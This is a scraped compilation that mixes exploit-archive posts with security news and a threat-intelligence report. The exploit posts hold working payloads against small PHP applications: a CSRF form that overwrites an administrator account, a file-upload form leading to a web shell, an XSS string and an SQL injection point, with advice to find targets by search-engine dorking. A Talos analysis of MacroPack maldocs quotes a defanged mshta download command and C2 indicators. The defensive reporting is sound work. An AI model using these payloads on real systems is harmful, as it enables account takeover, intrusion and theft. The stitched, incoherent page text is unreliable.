PPDB version 2.4-update 6118-1 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ppdb v2.4-update 6118-1 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 10. Set the target website link Save changes and apply . 

[+] infected file : /root/psb-user-update.php.

[+] save code as poc.html 

[+] payload : 

<div class="col-lg-6">  
                <h2 class="page-header">Administrator</h2>  
                    <div class="panel panel-default">  
                        <div class="panel-heading">  
                            User Profile   
                        </div>  
                          
                        <div class="panel-body">  
                            <div class="table-responsive">  
                <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data">  
                                <table class="table table-striped table-bordered table-hover">

                                                                      <tbody>

                             <tr>    
                    <td>Username</td>  
                    <td><input class="form-control" type="text" name="username" value="indoushka" required="">  
                    <input class="form-control" type="hidden" name="id" value="1"></td>  
                    </tr>

                    <tr>  
                    <td>Password</td>  
                    <td><input class="form-control" type="password" name="password" id="password" required=""></td>  
                    </tr>  
                    <tr>  
                    <td>Nama</td>  
                    <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td>  
                    </tr>

                    <tr>  
                    <td>Email</td>  
                    <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required="">  
                    <input type="hidden" name="level" id="level" value="1">  
                    </td>  
                    </tr>  
                    <tr>  
<td colspan="3"><input type="file" name="foto" id="foto" required=""></td>  
</tr>

                                            </tbody>  
                                </table>  
                                <button type="submit" class="btn btn-primary" name="update" id="update">Update</button>  
                                </form>  
                            </div>  
                              
                        </div>  
                          
                    </div>  
                      
                </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

PPDB 2.4-update 6118-1 Cross Site Request Forgery

Online Travel Agency System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Travel Agency System v1.0 Remote File Upload Vulnerability                                                           |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/online-travel-agency-system-using-php.html                                                   |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply . 

[+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html>  
<head>  
    <title>Employee Form</title>  
</head>  
<body>  
    <h2>Employee Form</h2>  
    <form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data">  
        <label for="userfile">Profile Picture:</label>  
        <input type="file" id="userfile" name="userfile" required><br><br>

        <input type="submit" name="employeeform" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Travel Agency System 1.0 Arbitrary File Upload

A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus.
"Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools.
"For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which

A hacktivist group known as **Head Mare** has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus.

"Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools.

"For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which allows the attacker to execute arbitrary code on the system via a specially prepared archive. This approach allows the group to deliver and disguise the malicious payload more effectively."

Head Mare, active since 2023, is one of the hacktivist groups attacking Russian organizations in the context of the Russo-Ukrainian conflict that began a year before.

It also maintains a presence on X, where it has leaked sensitive information and internal documentation from victims. Targets of the group's attacks include governments, transportation, energy, manufacturing, and environment sectors.

Unlike other hacktivist personas that likely operate with an aim to inflict "maximum damage" to companies in the two countries, Head Mare also encrypts victims' devices using LockBit for Windows and Babuk for Linux (ESXi), and demands a ransom for data decryption.

Also part of its toolkit are PhantomDL and PhantomCore, the former of which is a Go-based backdoor that's capable of delivering additional payloads and uploading files of interest to a command-and-control (C2) server.

PhantomCore (aka PhantomRAT), a predecessor to PhantomDL, is a remote access trojan with similar features, allowing for downloading files from the C2 server, uploading files from a compromised host to the C2 server, as well as executing commands in the cmd.exe command line interpreter.

"The attackers create scheduled tasks and registry values named MicrosoftUpdateCore and MicrosoftUpdateCoree to disguise their activity as tasks related to Microsoft software," Kaspersky said.

"We also found that some LockBit samples used by the group had the following names: OneDrive.exe \[and\] VLC.exe. These samples were located in the C:\\ProgramData directory, disguising themselves as legitimate OneDrive and VLC applications."

Both the artifacts have been found to be distributed via phishing campaigns in the form of business documents with double extensions (e.g., решение №201-5\_10вэ\_001-24 к пив экран-сои-2.pdf.exe or тз на разработку.pdf.exe).

Another crucial component of its attack arsenal is Sliver, an open-source C2 framework, and a collection of various publicly available tools such as rsockstun, ngrok, and Mimikatz that facilitate discovery, lateral movement, and credential harvesting.

The intrusions culminate in the deployment of either LockBit or Babuk depending on the target environment, followed by dropping a ransom note that demands a payment in exchange for a decryptor to unlock the files.

"The tactics, methods, procedures, and tools used by the Head Mare group are generally similar to those of other groups associated with clusters targeting organizations in Russia and Belarus within the context of the Russo-Ukrainian conflict," the Russian cybersecurity vendor said.

"However, the group distinguishes itself by using custom-made malware such as PhantomDL and PhantomCore, as well as exploiting a relatively new vulnerability, CVE-2023-38831, to infiltrate the infrastructure of their victims in phishing campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hacktivists Exploits WinRAR Vulnerability in Attacks Against Russia and Belarus

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.
"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.

"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity company Morphisec said in a technical report shared with The Hacker News.

Written in Rust and capable of targeting both Windows and Linux/ESXi hosts, Cicada3301 first emerged in June 2024, inviting potential affiliates to join their ransomware-as-a-service (RaaS) platform via an advertisement on the RAMP underground forum.

A notable aspect of the ransomware is that the executable embeds the compromised user's credentials, which are then used to run PsExec, a legitimate tool that makes it possible to run programs remotely.

Cicada3301's similarities with BlackCat also extend to its use of ChaCha20 for encryption, fsutil to evaluate symbolic links and encrypt redirected files, as well as IISReset.exe to stop the IIS services and encrypt files that may otherwise be locked for for modification or deletion.

Other overlaps to BlackCat include steps undertaken to delete shadow copies, disable system recovery by manipulating the bcdedit utility, increase the MaxMpxCt value to support higher volumes of traffic (e.g., SMB PsExec requests), and clear all event logs by utilizing the wevtutil utility.

Cicada3301 has also observed stopping locally deployed virtual machines (VMs), a behavior previously adopted by the Megazord ransomware and the Yanluowang ransomware, and terminating various backup and recovery services and a hard-coded list of dozens of processes.

Besides maintaining a built-in list of excluded files and directories during the encryption process, the ransomware targets a total of 35 file extensions - sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

Morphisec said its investigation also uncovered additional tools like EDRSandBlast that weaponize a vulnerable signed driver to bypass EDR detections, a technique also adopted by the BlackByte ransomware group in the past.

The findings follow Truesec's analysis of the ESXi version of Cicada3301, while also uncovering indications that the group may have teamed up with the operators of the Brutus botnet to obtain initial access to enterprise networks.

"Regardless of whether Cicada3301 is a rebrand of ALPHV, they have a ransomware written by the same developer as ALPHV, or they have just copied parts of ALPHV to make their own ransomware, the timeline suggests the demise of BlackCat and the emergence of first the Brutus botnet and then the Cicada3301 ransomware operation may possibly be all connected," the company noted.

The attacks against VMware ESXi systems also entail using intermittent encryption to encrypt files larger than a set threshold (100 MB) and a parameter named "no\_vm\_ss" to encrypt files without shutting down the virtual machines that are running on the host.

The emergence of Cicada3301 has also prompted an eponymous "non-political movement," which has dabbled in "mysterious" cryptographic puzzles, to issue a statement that it has no connection to the ransomware scheme.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

*   Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
*   MacroPack is a framework designated for Red Team exercises, but we assess, with moderate confidence, that malicious actors are also using it to deploy malicious payloads.
*   Talos analyzed the most recent documents uploaded to VirusTotal from different sources and countries, including China, Pakistan, Russia and the U.S., uncovering connections between the payloads and motivations for creating these documents.
*   These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
*   Talos was not able to attribute these activities to a single actor despite some similarities in tactics, techniques and procedures (TTPs). No Talos customers were affected by these attacks and there are no related activities  in any Cisco product telemetry.

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. 

As a part of regular hunting exercises for malicious documents similar to the ones used by UNC1151, we discovered several suspicious documents using VBA macros that were similar but could not be attributed to the same threat actor.

Although the VBA code was similar — using obfuscated variable and function names and one or more layers of obfuscated code in their following stages — the lure themes were different, ranging from generic topics that instruct users to enable VBA macros, to official-looking documents and letters that appear to come from military organizations, pointing to various distinct threat actors. 

**Common characteristics of MacroPack VBA code**

The VBA code in all the documents had similar characteristics, which we traced to the MacroPack framework. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. 

The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures:

*   Function renaming.
*   Variable renaming.
*   Removal of surplus space characters.
*   Removal of comments.
*   Strings encoding.
*   Payload obfuscation.

A payload string deobfuscation function generated by MacroPack.

MacroPack is designed to be easy to use and quickly generate various payloads allowing users to build working implants with a single command line. 

MacroPack also exists in a professional, supported version, which contains additional functionality to make payloads more resilient and has some more advanced features such as anti-malware bypass, more advanced payloads, anti-reversing and additional payloads. The author states that the tool is intended to be used by Red Team members and not for malicious purposes, although there is no control over who uses the free version of the tool. 

**Inclusion of non-malicious code**

A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines. These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents. 

At the beginning of the investigation, we suspected all the documents containing these unusual non-malicious subroutines were created by a single threat actor. But the different document lures and countries from where the documents were uploaded lead us to conclude that those subroutines were included by the professional version of MacroPack, which we confirmed via reliable, high-fidelity sources. 

Snippet of code taken from a Word programming book.

We traced the origin of the two functions to a website hosting various VBA examples and one to a French Microsoft Word programming book “Rédigez Facilement Des Documents Avec Word” (“Easily Writing Documents with Word”) by Michel Martin.

Non-malicious functions common for all discovered documents from the VBA examples website.

The inclusion of the benign code is likely to lower the level of suspicion of the code generated by MacroPack. Some anti-malware engines may be able to detect code as suspicious if the entropy of the code is high to indicate pseudo-randomly named variables, functions and obfuscated strings and the inclusion of non-malicious functions with low entropy may be used to lower the overall entropy of the generated code. 

Some documents containing the non-malicious code, attributed to MacroPack, also used a different technique for generating code. Instead of completely pseudo-randomly generated variable and function names, they consisted of combinations of randomly chosen real words. 

The MacroPack author indicated that he worked on a feature to generate names using Markov chains to create seemingly meaningful function and variable names. 

MacroPack author announced the random name generator based on valid English words on X (Twitter). 

This functionality was included by the MacroPack author to improve the bypassing of anti-malware heuristic detections. We discovered a few samples using this technique to obfuscate the functionality of the code with meaningful-looking function and variable names.

Function and variable names generated by a Markov chain.

**MacroPack documents uploaded to VirusTotal**

Although the TTPs in the discovered samples seem malicious and the lure themes indicate that they are, we were unable to trace the actors to a particular group, which also leaves a possibility that they were part of red teaming exercises. However, it is still important to document the samples as blue teams may also encounter them in their own detection tests. 

For some discovered samples, we confirmed they were part of some Red Team activities and they are not included in the list of IOCs. A description of a few interesting clusters of documents follows. 

All the documents have a similar flow, being generated by the framework and consist of at least three stages of code before connecting to the C2 server, to allow infected systems to be controlled by the threat actors. 

Stages of execution for discovered MacroPack-generated documents.

**Theme 1: Lures uploaded from China**

The first cluster of three documents were uploaded to VirusTotal from IP addresses residing in China, Taiwan and Pakistan in May and July 2024, and feature three similar lures with a generic Word document content that instructs the users to “enable content,” which would allow a VBA macro code to execute. The beginning of the document contains this text either in Chinese or English. 

__Chinese version of the lure.__

All C2 IP addresses for the payloads of the generic template campaign reside in the address space of the same autonomous system, AS4837, located in the Henan province in China, which, together with the usage of similar lure themes and MacroPack, enable us to cluster them as originating from a single actor. 

__English variant of the lure.__

**Theme 1 payloads**

Two of the three documents, the ones with lures in Chinese, have the Havoc demon (implant) as the final payload. Havoc is a post-exploitation command and control (C2) framework made for penetration testers, Red Teams and Blue Teams. It's free and open-source on GitHub, written and maintained by Paul Ungur. The Havoc Framework is split into two components — the teamserver and the agent. The Teamserver handles connected operators, tasking agents and parsing the callbacks, results of commands, uploaded files and screenshots. The agents or implants are called demons, in Havoc terminology, and are installed by the operator to the systems that should be controlled.The agents allow the operators to remotely control affected systems. 

The difference between the two variants are that they have different IP addresses for C2, and one lure is compiled for 64-bit Windows, while the other is for 32-bit Windows. Both lures are likely related, as they share similar lure themes, have the same AS for C2 addresses and have C2 URLs that appear as if cloud email communication is attempted, together with appropriate referrers set up in HTTP headers.

First Havoc demon communication to C2, with appropriate HTTP headers specified in its configuration buffer.

After the shellcode loads the Havoc demon, the DLL reads its configuration hosts from a plain text structure.

The second payload is a Brute Ratel implant (badger) loaded from a shellcode loader as a DLL.  Brute Ratel is a C2 framework primarily used for Red Teaming and adversary simulation, although it was also abused by real threat actors. 

Brute Ratel is a very popular framework similar to Cobalt Strike and enables its users to:

*   Deploy agents (called badgers) onto target systems.
*   Execute commands remotely.
*   Perform lateral movement within a network.
*   Establish persistence.
*   Evade detection by endpoint security solutions.

The configuration for the badger is stored in the shellcode body (approximately 250KB long) and the DLL decrypts it using RC4 decryption with the decryption key hardcoded in the badger executable. 

Brute Ratel configuration is decrypted by a RC4 decryption routine in the DLL badger.

**Theme 2: Pakistani military lures**

The second cluster of documents, with Pakistani military-related themes, were uploaded to VirusTotal from two different locations in Pakistan. We have elected to classify them together based on the military-related themes and a Brute Ratel DLL badger as the final payload.

Pakistani military-themed document lure uploaded to VirusTotal in January 2024. 

The first document contains an embedded image of a document masquerading as a circular claiming to announce new awards for certain officer ranks in the Pakistan Air Force, with land plots as a reward for their services. When the document is opened and VBA code allowed to run, the MacroPack-generated code will create a Brute Ratel shellcode loader in memory and execute it to load a badger DLL. The configuration for all DLL implants is contained in the shellcode and is used by the badger after decryption using RC4-based decryption. 

The implant in the first document is configured to use DNS over HTTPs with dns\[.\]google and cloudflare-dns\[.\]com servers to tunnel the data over DNS for hosts dns1\[.\]s-logistics\[.\]net and dns2\[.\]s-logistics\[.\]net.

The second lure purports to be a confidential document sent to a specific recipient containing an employment confirmation letter for a civilian member of Pakistan’s Air Force Cyber Team. The payload for this document is also a DLL-based Brute Ratel badger, but this time using several Amazon Cloudfront CDN servers for the C2 rotation. 

Pakistani military-themed document lure uploaded to VirusTotal in February 2024. 

One interesting characteristic of the second document’s Brute Ratel payload is the inclusion of a base64-encoded blob containing a JSON object created to be used with the Adobe Experience Cloud ecosystem for tracking marketing activities. One possible reason for this is that the document was part of a Red Team exercise and Adobe Experience Cloud was used to track the target’s engagement.

Adobe Experience Cloud requests details from the second document.

**Theme 3: Lure uploaded from Russia**

A few things stood out when we observed a file created with MacroPack uploaded to VirusTotal from a Russian IP address at the beginning of July 2024. While most of the other files we analyzed were Word documents, this one is an Excel workbook. The lure also is completely void of content, and when the workbook is opened, there is nothing to see. 

The VBA code was also a bit different from the ones discovered earlier. Instead of creating a byte array containing shellcode and loading it into the host process, this one had more VBA code for the next stage, and the way it was executed was also quite unusual. 

__Partially deobfuscated second stage attempt to download and execute a file from a URL__

_._The first-stage code generates the second VBA layer, launches a new instance of Excel and creates a new workbook that is the target for the injection of the second stage, similar to VBA virus infection. 

When the second stage is executed, it attempts to download, load and execute a file from the URL hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg. We have no indication that this TTP was successful. 

**Theme 3 payload**

At the time of writing this post, the target URL contained a sample of a Golang-based backdoor PhantomCore, which is attributed by researchers from Kaspersky to the Ukrainian hacktivist Head Mare, allegedly targeting government organizations and companies in Russia with the goal of cyber espionage. 

__Before connecting to listen for commands, the C2 host and port are retrieved from PhantomCore data.__

Some PhantomCore variants are obfuscated with the Golang obfuscator, garble, which makes them more challenging for the analyst, but the core functionality is similar — to connect to a C2 server using the rsocket protocol and listen for commands that allows it to install additional modules, upload data or execute a command. 

**Theme 4: Uploaded from the U.S.**

 This final theme was uploaded to VirusTotal much earlier than the previous examples (March 2023) and it purports to be an encrypted NMLS (U.S. Nationwide Multistate Licensing System & Registry) renewal form. We chose this document lure to demonstrate MacroPack’s usage of a Markov Chain-based name generator. This document, similar to the lure uploaded from Russia, has multiple VBA stages. 

The first stage decodes the second and launches another Word instance to run it. Before launching the final payload, the second stage checks for the presence of the analysis environment, such as sandboxes and test systems. 

The second stage code will exit any the following conditions are satisfied:

*   Number of logical CPUs in the system is 1.
*   The User name is “USER”.
*   One of the following processes are active: fiddler, vxstream, vboxservice, tcpview, vmware, procexp, wmtools, processexplorer, processhacker, vbox, autoit, wireshark, procmon, idaq, autoruns, apatedns or windbg.
*   The overall disk size is smaller than 60GB.
*   Total memory size is smaller than 1GB.
*   Word Application recent files count is smaller than three.

__Obfuscated function is checking for presence of analysis environment before downloading the payload.__

The final payload was likely supposed to be an HTML application as the download and launch was attempted by executing the command line “mshta.exe hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc”. At the time of writing, Talos has not been able to retrieve and identify the final payload. 

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 63942.

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

**Theme 1**

0cf1e59bae9dba7fbbf6ee6a36ca6bdb8fa0ac002b8cf824bd0888789a981c57 -64 bit Havoc demon

hxxps\[://\]122\[.\]114\[.\]141\[.\]214/qq\[.\]com/ab735a258a90e8e1f3e3dcf231bf53a9/mail/ - Havoc C2

93df1d60edd6b656b08e0fc0d31b330fd275f5e1a9069dfbb769e7ba217fcb6e - Brute Ratel loader

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/qazxsw -Brute Ratel C2

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/edcvfr

2131de0cb705afa52f88ef70a87ee6c8662d38db0138efc4940218ee62d8a296 - 32 bit Havoc demon

hxxp\[://\]122\[.\]114\[.\]166\[.\]92/Collectors/3\[.\]0/settings/mail/ - Havoc C2

**Theme 2**

cbafcf65b40d95e4699859a523ef4d300c57f93de6fbc6e194d1b922e9f3aba6 - PAF cyber team lure

b5608e73eb460944d9b523a940d94c95d3eb66d6a8efe82462e2589ccfaadb82 - allotment of plots, Pakistan military

dns1\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

dns2\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php - Brute Ratel C2

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net//HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

**Theme 3**

e1ee389b2af2d3a0eff4aa14f2ac3de6cdd4a73de80b5d450a44ec69cd332dbf - Excel malicious workbook

80731db97c33b50cd3d8727decec7e6a12bbf5f671527648c4cbb559fabc3074 - payload PhantomCore RAT

api.wilbderreis\[.\]ru - PhantomCore C2, using rsocket protocol on port 80

hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg

**Theme 4**

2c0a66c6370b4aa88ab3805d520e868cbc513b43119958257a72c9ff58ef241c - NMLS renewal theme maldoc

hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc

Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads

A 57-year-old man from the U.S. state of Missouri has been arrested in connection with a failed data extortion campaign that targeted his former employer.
Daniel Rhyne of Kansas City, Missouri, has been charged with one count of extortion in relation to a threat to cause damage to a protected computer, one count of intentional damage to a protected computer, and one count of wire fraud.
He was

Insider Threat / Network Security

A 57-year-old man from the U.S. state of Missouri has been arrested in connection with a failed data extortion campaign that targeted his former employer.

Daniel Rhyne of Kansas City, Missouri, has been charged with one count of extortion in relation to a threat to cause damage to a protected computer, one count of intentional damage to a protected computer, and one count of wire fraud.

He was arrested in the state on August 27, 2024, following an attempt to extort an unnamed industrial company that's headquartered in Somerset County, New Jersey, where he was employed as a core infrastructure engineer.

Per court documents, some employees of the company are said to have received an extortion email that warned all of its IT administrators had been locked out or removed from the network, data backups had been deleted, and an additional 40 servers would be shut down each day over the next 10 days if a ransom of 20 bitcoin, then valued at $750,000, wasn't paid.

"The investigation revealed that Rhyne gained unauthorized access to the company's computer systems by remotely accessing the company administrator account," the U.S. Department of Justice (DoJ) said.

"Rhyne then, without authorization, scheduled several computer tasks to be carried out on the network, including changing the company administrator passwords and shutting down its servers. Rhyne controlled the email address used to send the November 25 extortion email to the company's employees."

Rhyne is believed to have used Windows' net user and Sysinternals Utilities' PsPasswd tool to modify the domain and local administrator accounts and change the passwords to "TheFr0zenCrew!," prosecutors claimed in court documents.

Authorities said the defendant allegedly used a hidden virtual machine to remotely access an admin account that was not only traced back to his company-issued laptop, but also to search the web for details on how to use the command-line to change the local administrator password and clear Windows logs.

Rhyne, who made his initial appearance on the same day of his arrest, faces a maximum penalty of 35 years in prison and a $750,000 fine for all three charges.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ex-Engineer Charged in Missouri for Failed $750,000 Bitcoin Extortion Attempt

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

Online Job Portal IN version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Online Job Portal IN v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Job_Portal_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /refresh_job_search.php?experience=&qualification=fasd[+] http://127.0.0.1/Job-Portal-master/refresh_job_search.php?experience=&qualification=fasd <=== inject here[+] Login : /admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Job Portal IN 1.0 SQL Injection

pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.

